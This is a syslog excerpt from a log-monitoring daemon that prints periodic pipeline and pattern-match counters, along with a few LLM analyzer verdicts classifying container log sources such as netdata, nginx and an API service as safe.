Mar 20 10:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:57:01.952749 [observer] Patterns: hash=4316 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98
Mar 20 10:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:57:31.934373 [observer] Pipeline: processed=4418 pattern_hits=4320 llm_calls=98 llm_errors=1 learned=3
Mar 20 10:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:57:31.934407 [observer] Patterns: hash=4320 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98
Mar 20 10:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:58:01.942117 [observer] Pipeline: processed=4420 pattern_hits=4322 llm_calls=98 llm_errors=1 learned=3
Mar 20 10:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:58:01.942144 [observer] Patterns: hash=4322 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98
Mar 20 10:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:58:31.944720 [observer] Pipeline: processed=4422 pattern_hits=4324 llm_calls=98 llm_errors=1 learned=3
Mar 20 10:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:58:31.944747 [observer] Patterns: hash=4324 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98
Mar 20 10:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:59:01.951562 [observer] Pipeline: processed=4428 pattern_hits=4330 llm_calls=98 llm_errors=1 learned=3
Mar 20 10:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:59:01.951596 [observer] Patterns: hash=4330 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98
Mar 20 10:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:59:31.934477 [observer] Pipeline: processed=4430 pattern_hits=4332 llm_calls=98 llm_errors=1 learned=3
Mar 20 10:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 10:59:31.934500 [observer] Patterns: hash=4332 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98
Mar 20 11:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:00:01.968767 [observer] Pipeline: processed=4434 pattern_hits=4336 llm_calls=98 llm_errors=1 learned=3
Mar 20 11:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:00:01.972359 [observer] Patterns: hash=4336 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98
Mar 20 11:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:00:31.935561 [observer] Pipeline: processed=4436 pattern_hits=4338 llm_calls=98 llm_errors=1 learned=3
Mar 20 11:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:00:31.935594 [observer] Patterns: hash=4338 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98
Mar 20 11:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:01:01.942250 [observer] Pipeline: processed=4440 pattern_hits=4342 llm_calls=98 llm_errors=1 learned=3
Mar 20 11:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:01:01.942370 [observer] Patterns: hash=4342 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98
Mar 20 11:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:01:31.943318 [observer] Pipeline: processed=4442 pattern_hits=4344 llm_calls=98 llm_errors=1 learned=3
Mar 20 11:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:01:31.943343 [observer] Patterns: hash=4344 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98
Mar 20 11:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:02:01.946409 [observer] Pipeline: processed=4444 pattern_hits=4346 llm_calls=98 llm_errors=1 learned=3
Mar 20 11:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:02:01.946442 [observer] Patterns: hash=4346 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98
Mar 20 11:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:02:31.935520 [observer] Pipeline: processed=4448 pattern_hits=4350 llm_calls=98 llm_errors=1 learned=3
Mar 20 11:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:02:31.935551 [observer] Patterns: hash=4350 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98
Mar 20 11:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:03:01.946716 [observer] Pipeline: processed=4450 pattern_hits=4352 llm_calls=98 llm_errors=1 learned=3
Mar 20 11:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:03:01.946747 [observer] Patterns: hash=4352 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98
Mar 20 11:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:03:31.934944 [observer] Pipeline: processed=4454 pattern_hits=4356 llm_calls=98 llm_errors=1 learned=3
Mar 20 11:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:03:31.934970 [observer] Patterns: hash=4356 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98
Mar 20 11:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:04:01.964487 [observer] Pipeline: processed=4458 pattern_hits=4360 llm_calls=98 llm_errors=1 learned=3
Mar 20 11:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:04:01.964518 [observer] Patterns: hash=4360 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98
Mar 20 11:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:04:31.935344 [observer] Pipeline: processed=4462 pattern_hits=4364 llm_calls=98 llm_errors=1 learned=3
Mar 20 11:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:04:31.935376 [observer] Patterns: hash=4364 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98
Mar 20 11:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:05:01.989932 [observer] Pipeline: processed=4464 pattern_hits=4366 llm_calls=98 llm_errors=1 learned=3
Mar 20 11:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:05:01.990089 [observer] Patterns: hash=4366 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98
Mar 20 11:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:05:31.940312 [observer] Pipeline: processed=4466 pattern_hits=4368 llm_calls=98 llm_errors=1 learned=3
Mar 20 11:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:05:31.940343 [observer] Patterns: hash=4368 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98
Mar 20 11:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:06:01.996129 [observer] Pipeline: processed=4470 pattern_hits=4372 llm_calls=98 llm_errors=1 learned=3
Mar 20 11:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:06:01.996313 [observer] Patterns: hash=4372 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98
Mar 20 11:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:06:31.943644 [observer] Pipeline: processed=4472 pattern_hits=4374 llm_calls=98 llm_errors=1 learned=3
Mar 20 11:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:06:31.943668 [observer] Patterns: hash=4374 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=98
Mar 20 11:06:55 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:06:55.935073 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 11:06:55 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:06:55.935109 [analyzer] Confidence 0.75 too low for pattern learning (need 0.85+)
Mar 20 11:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:07:01.962740 [observer] Pipeline: processed=4478 pattern_hits=4378 llm_calls=100 llm_errors=1 learned=3
Mar 20 11:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:07:01.962770 [observer] Patterns: hash=4378 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=100
Mar 20 11:07:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:07:04.230431 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 11:07:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:07:04.230476 [analyzer] Confidence 0.72 too low for pattern learning (need 0.85+)
Mar 20 11:07:10 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:07:10.340650 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.82 action=allow pattern_type=prefix
Mar 20 11:07:10 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:07:10.340711 [analyzer] Confidence 0.82 too low for pattern learning (need 0.85+)
Mar 20 11:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:07:31.934531 [observer] Pipeline: processed=4481 pattern_hits=4380 llm_calls=101 llm_errors=1 learned=3
Mar 20 11:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:07:31.934556 [observer] Patterns: hash=4380 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=101
Mar 20 11:08:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:08:01.963376 [observer] Pipeline: processed=4485 pattern_hits=4384 llm_calls=101 llm_errors=1 learned=3
Mar 20 11:08:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:08:01.963407 [observer] Patterns: hash=4384 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=101
Mar 20 11:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:08:31.934291 [observer] Pipeline: processed=4487 pattern_hits=4386 llm_calls=101 llm_errors=1 learned=3
Mar 20 11:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:08:31.934314 [observer] Patterns: hash=4386 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=101
Mar 20 11:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:09:01.945868 [observer] Pipeline: processed=4491 pattern_hits=4390 llm_calls=101 llm_errors=1 learned=3
Mar 20 11:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:09:01.945903 [observer] Patterns: hash=4390 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=101
Mar 20 11:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:09:31.934308 [observer] Pipeline: processed=4495 pattern_hits=4394 llm_calls=101 llm_errors=1 learned=3
Mar 20 11:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:09:31.934332 [observer] Patterns: hash=4394 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=101
Mar 20 11:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:10:01.953510 [observer] Pipeline: processed=4497 pattern_hits=4396 llm_calls=101 llm_errors=1 learned=3
Mar 20 11:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:10:01.953545 [observer] Patterns: hash=4396 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=101
Mar 20 11:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:10:31.934572 [observer] Pipeline: processed=4501 pattern_hits=4400 llm_calls=101 llm_errors=1 learned=3
Mar 20 11:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:10:31.934594 [observer] Patterns: hash=4400 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=101
Mar 20 11:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:11:01.948851 [observer] Pipeline: processed=4503 pattern_hits=4402 llm_calls=101 llm_errors=1 learned=3
Mar 20 11:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:11:01.948883 [observer] Patterns: hash=4402 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=101
Mar 20 11:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:11:31.935286 [observer] Pipeline: processed=4507 pattern_hits=4406 llm_calls=101 llm_errors=1 learned=3
Mar 20 11:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:11:31.935310 [observer] Patterns: hash=4406 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=101
Mar 20 11:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:12:01.945190 [observer] Pipeline: processed=4509 pattern_hits=4408 llm_calls=101 llm_errors=1 learned=3
Mar 20 11:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:12:01.945457 [observer] Patterns: hash=4408 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=101
Mar 20 11:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:12:31.952486 [observer] Pipeline: processed=4511 pattern_hits=4410 llm_calls=101 llm_errors=1 learned=3
Mar 20 11:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:12:31.952511 [observer] Patterns: hash=4410 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=101
Mar 20 11:13:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:13:00.871482 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 11:13:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:13:00.871520 [analyzer] Confidence 0.72 too low for pattern learning (need 0.85+)
Mar 20 11:13:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:13:02.041217 [observer] Pipeline: processed=4517 pattern_hits=4414 llm_calls=103 llm_errors=1 learned=3
Mar 20 11:13:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:13:02.042397 [observer] Patterns: hash=4414 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103
Mar 20 11:13:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:13:03.257686 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.85 action=allow pattern_type=prefix
Mar 20 11:13:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:13:03.257740 [analyzer] Source hint mismatch: LLM says "nginx", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern
Mar 20 11:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:13:31.944468 [observer] Pipeline: processed=4519 pattern_hits=4416 llm_calls=103 llm_errors=1 learned=3
Mar 20 11:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:13:31.944491 [observer] Patterns: hash=4416 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103
Mar 20 11:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:14:01.945312 [observer] Pipeline: processed=4523 pattern_hits=4420 llm_calls=103 llm_errors=1 learned=3
Mar 20 11:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:14:01.945336 [observer] Patterns: hash=4420 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103
Mar 20 11:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:14:31.944839 [observer] Pipeline: processed=4527 pattern_hits=4424 llm_calls=103 llm_errors=1 learned=3
Mar 20 11:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:14:31.944894 [observer] Patterns: hash=4424 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103
Mar 20 11:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:15:01.951502 [observer] Pipeline: processed=4531 pattern_hits=4428 llm_calls=103 llm_errors=1 learned=3
Mar 20 11:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:15:01.951534 [observer] Patterns: hash=4428 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103
Mar 20 11:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:15:31.944390 [observer] Pipeline: processed=4533 pattern_hits=4430 llm_calls=103 llm_errors=1 learned=3
Mar 20 11:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:15:31.944420 [observer] Patterns: hash=4430 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103
Mar 20 11:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:16:01.972045 [observer] Pipeline: processed=4535 pattern_hits=4432 llm_calls=103 llm_errors=1 learned=3
Mar 20 11:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:16:01.972104 [observer] Patterns: hash=4432 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103
Mar 20 11:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:16:31.936453 [observer] Pipeline: processed=4539 pattern_hits=4436 llm_calls=103 llm_errors=1 learned=3
Mar 20 11:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:16:31.936475 [observer] Patterns: hash=4436 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103
Mar 20 11:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:17:01.942532 [observer] Pipeline: processed=4541 pattern_hits=4438 llm_calls=103 llm_errors=1 learned=3
Mar 20 11:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:17:01.942565 [observer] Patterns: hash=4438 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103
Mar 20 11:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:17:31.935884 [observer] Pipeline: processed=4545 pattern_hits=4442 llm_calls=103 llm_errors=1 learned=3
Mar 20 11:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:17:31.935914 [observer] Patterns: hash=4442 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103
Mar 20 11:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:18:01.954341 [observer] Pipeline: processed=4547 pattern_hits=4444 llm_calls=103 llm_errors=1 learned=3
Mar 20 11:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:18:01.954363 [observer] Patterns: hash=4444 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103
Mar 20 11:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:18:31.935706 [observer] Pipeline: processed=4551 pattern_hits=4448 llm_calls=103 llm_errors=1 learned=3
Mar 20 11:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:18:31.935736 [observer] Patterns: hash=4448 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103
Mar 20 11:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:19:01.967791 [observer] Pipeline: processed=4553 pattern_hits=4450 llm_calls=103 llm_errors=1 learned=3
Mar 20 11:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:19:01.967820 [observer] Patterns: hash=4450 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103
Mar 20 11:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:19:31.949628 [observer] Pipeline: processed=4557 pattern_hits=4454 llm_calls=103 llm_errors=1 learned=3
Mar 20 11:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:19:31.949652 [observer] Patterns: hash=4454 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103
Mar 20 11:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:20:01.944190 [observer] Pipeline: processed=4561 pattern_hits=4458 llm_calls=103 llm_errors=1 learned=3
Mar 20 11:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:20:01.944217 [observer] Patterns: hash=4458 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103
Mar 20 11:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:20:31.944675 [observer] Pipeline: processed=4563 pattern_hits=4460 llm_calls=103 llm_errors=1 learned=3
Mar 20 11:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:20:31.944704 [observer] Patterns: hash=4460 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103
Mar 20 11:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:21:01.976005 [observer] Pipeline: processed=4567 pattern_hits=4464 llm_calls=103 llm_errors=1 learned=3
Mar 20 11:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:21:01.976042 [observer] Patterns: hash=4464 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103
Mar 20 11:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:21:31.943809 [observer] Pipeline: processed=4569 pattern_hits=4466 llm_calls=103 llm_errors=1 learned=3
Mar 20 11:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:21:31.943839 [observer] Patterns: hash=4466 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103
Mar 20 11:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:22:01.986113 [observer] Pipeline: processed=4573 pattern_hits=4470 llm_calls=103 llm_errors=1 learned=3
Mar 20 11:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:22:01.990577 [observer] Patterns: hash=4470 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103
Mar 20 11:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:22:31.943433 [observer] Pipeline: processed=4575 pattern_hits=4472 llm_calls=103 llm_errors=1 learned=3
Mar 20 11:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:22:31.943464 [observer] Patterns: hash=4472 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103
Mar 20 11:23:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:23:02.067631 [observer] Pipeline: processed=4577 pattern_hits=4474 llm_calls=103 llm_errors=1 learned=3
Mar 20 11:23:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:23:02.067669 [observer] Patterns: hash=4474 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103
Mar 20 11:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:23:31.936040 [observer] Pipeline: processed=4581 pattern_hits=4478 llm_calls=103 llm_errors=1 learned=3
Mar 20 11:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:23:31.936071 [observer] Patterns: hash=4478 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103
Mar 20 11:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:24:01.983456 [observer] Pipeline: processed=4583 pattern_hits=4480 llm_calls=103 llm_errors=1 learned=3
Mar 20 11:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:24:01.983494 [observer] Patterns: hash=4480 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103
Mar 20 11:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:24:31.935453 [observer] Pipeline: processed=4589 pattern_hits=4486 llm_calls=103 llm_errors=1 learned=3
Mar 20 11:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:24:31.935480 [observer] Patterns: hash=4486 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103
Mar 20 11:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:25:01.947326 [observer] Pipeline: processed=4591 pattern_hits=4488 llm_calls=103 llm_errors=1 learned=3
Mar 20 11:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:25:01.947354 [observer] Patterns: hash=4488 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103
Mar 20 11:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:25:31.935918 [observer] Pipeline: processed=4594 pattern_hits=4491 llm_calls=103 llm_errors=1 learned=3
Mar 20 11:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:25:31.935942 [observer] Patterns: hash=4491 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103
Mar 20 11:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:26:01.957726 [observer] Pipeline: processed=4597 pattern_hits=4494 llm_calls=103 llm_errors=1 learned=3
Mar 20 11:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:26:01.957752 [observer] Patterns: hash=4494 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103
Mar 20 11:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:26:31.939715 [observer] Pipeline: processed=4599 pattern_hits=4496 llm_calls=103 llm_errors=1 learned=3
Mar 20 11:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:26:31.939741 [observer] Patterns: hash=4496 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103
Mar 20 11:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:27:01.966293 [observer] Pipeline: processed=4603 pattern_hits=4500 llm_calls=103 llm_errors=1 learned=3
Mar 20 11:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:27:01.966386 [observer] Patterns: hash=4500 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103
Mar 20 11:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:27:31.945141 [observer] Pipeline: processed=4605 pattern_hits=4502 llm_calls=103 llm_errors=1 learned=3
Mar 20 11:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:27:31.945185 [observer] Patterns: hash=4502 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103
Mar 20 11:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:28:01.980262 [observer] Pipeline: processed=4609 pattern_hits=4506 llm_calls=103 llm_errors=1 learned=3
Mar 20 11:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:28:01.982504 [observer] Patterns: hash=4506 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103
Mar 20 11:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:28:31.943398 [observer] Pipeline: processed=4611 pattern_hits=4508 llm_calls=103 llm_errors=1 learned=3
Mar 20 11:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:28:31.943426 [observer] Patterns: hash=4508 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103
Mar 20 11:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:29:01.959678 [observer] Pipeline: processed=4614 pattern_hits=4511 llm_calls=103 llm_errors=1 learned=3
Mar 20 11:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:29:01.959719 [observer] Patterns: hash=4511 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103
Mar 20 11:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:29:31.940465 [observer] Pipeline: processed=4619 pattern_hits=4516 llm_calls=103 llm_errors=1 learned=3
Mar 20 11:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:29:31.940489 [observer] Patterns: hash=4516 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103
Mar 20 11:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:30:01.946390 [observer] Pipeline: processed=4621 pattern_hits=4518 llm_calls=103 llm_errors=1 learned=3
Mar 20 11:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:30:01.946504 [observer] Patterns: hash=4518 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103
Mar 20 11:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:30:31.935447 [observer] Pipeline: processed=4625 pattern_hits=4522 llm_calls=103 llm_errors=1 learned=3
Mar 20 11:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:30:31.935474 [observer] Patterns: hash=4522 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103
Mar 20 11:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:31:01.951499 [observer] Pipeline: processed=4627 pattern_hits=4524 llm_calls=103 llm_errors=1 learned=3
Mar 20 11:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:31:01.951541 [observer] Patterns: hash=4524 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103
Mar 20 11:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:31:31.935628 [observer] Pipeline: processed=4631 pattern_hits=4528 llm_calls=103 llm_errors=1 learned=3
Mar 20 11:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:31:31.935663 [observer] Patterns: hash=4528 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103
Mar 20 11:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:32:01.942610 [observer] Pipeline: processed=4633 pattern_hits=4530 llm_calls=103 llm_errors=1 learned=3
Mar 20 11:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:32:01.942651 [observer] Patterns: hash=4530 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103
Mar 20 11:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:32:31.935919 [observer] Pipeline: processed=4636 pattern_hits=4533 llm_calls=103 llm_errors=1 learned=3
Mar 20 11:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:32:31.935944 [observer] Patterns: hash=4533 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103
